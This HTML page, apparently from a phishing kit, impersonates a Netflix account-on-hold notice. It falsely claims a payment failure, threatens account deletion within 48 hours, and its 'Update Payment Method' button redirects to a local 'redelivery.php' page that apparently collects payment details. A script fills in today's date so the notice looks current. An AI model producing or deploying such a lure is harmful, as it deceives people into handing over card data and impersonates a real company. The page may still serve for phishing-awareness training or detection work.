<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <div class="container">

        <nav>
            <div>
                <img src="./net-logo.webp" >
            </div>
        </nav>
        <h2>Your Account On Hold.</h2>
        <div class="bod">
            <p>Please Update Your Payment Method.</p>
            <p>We regret to inform you that your account has been placed on hold due to an issue with your payment method. Our system was unable to verify your credit card information. Please update your payment details to reactivate your account and continue enjoying your subscription.</p>
            <p><b>Date</b>: <xx id="datenow">05/12/2024</xx></p>
            <!--
            
            -->    
            <p>To resolve this issue, please click on the button below to update your payment information</p>
            <div class="bntcontainer">
                <button onclick="redirect()">Update Payment Method</button>
            </div>
            <P style="margin-top: 30px;">If you do not update your payment information within the next 48 hours, your account will be removed, and you may not recover it again.</P>
    
            <p>Thank you for your prompt attention to this matter.</p>
            <p>Sincerely, Netflix.</p>
        </div>
        <footer>
            <p>Questions? Contact us.</p>
            <p>The Netflix team.</p>
        </footer>
    </div>
</body>
<script>
    const dateElement = document.getElementById('datenow');
    const today = new Date();
    const formattedDate = `${String(today.getDate()).padStart(2, '0')}/${String(today.getMonth() + 1).padStart(2, '0')}/${today.getFullYear()}`;
    dateElement.textContent = formattedDate;

    function redirect(){
        var link = "../src/design/redelivery.php";
        window.location.href = link;
    }
</script>
<style>
    body{
        margin: 0;
        padding: 0;
        box-sizing: border-box;
        color: #010124;
        display: flex;
        align-items: center;
        justify-content: center;
        background-color: rgb(252, 247, 242);
        font-family: system-ui, -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;
    }
    .container{
        width: 40%;
    }
    h2{
        
    }
    p{
        font-weight: 500;
    }
    nav {
        width: 100%;
        background-color: #000000;
        display: flex;
        align-items: center;
        justify-content: center;
        padding: 10px 0;
    }
    nav div{
        background-color: aliceblue;
        height: 60px;
        width: 200px;
        margin: 10px 0;
    }
    nav div img{
        height: 100%;
        width: 100%;
    }
    .bod{
        background-color: rgb(255, 255, 255);
        border-radius: 5px;
        padding: 5px 25px;
    }
    .bod .bntcontainer{
        width: 100%;
        display: flex;
        justify-content: center;
        margin-top: 35px;
    }
    .bod button{
        background-color: #E50912;
        color: #ffffff;
        outline: none;
        width: 250px;
        height: 48px;
        font-weight: 900;
        border-radius: 5px;
        border: none;
        transition: 0.4s ease-in-out;
    }
    .bod button:hover{
        border: 3px solid #00014D;
        background-color: transparent;
        color: #00014D;

    }
    footer {
        width: 100%;
        background-color: #201E1F;
        color: #ffffff;
        display: flex;
        flex-direction: column;
        padding: 5px 0;
        text-align: center;
    }
    footer p{
        padding: 0;
        font-size: 14px;
        font-weight: 400;
    }
    @media only screen and (max-width: 1500px) {
 
        .container {
            width: 60%;
        }
    }
    @media only screen and (max-width: 700px) {
 
        .container {
            width: 100%;
        }
        h2{
            font-size: 20px;
            margin-left: 18px;
        }
    }
</style>
</html>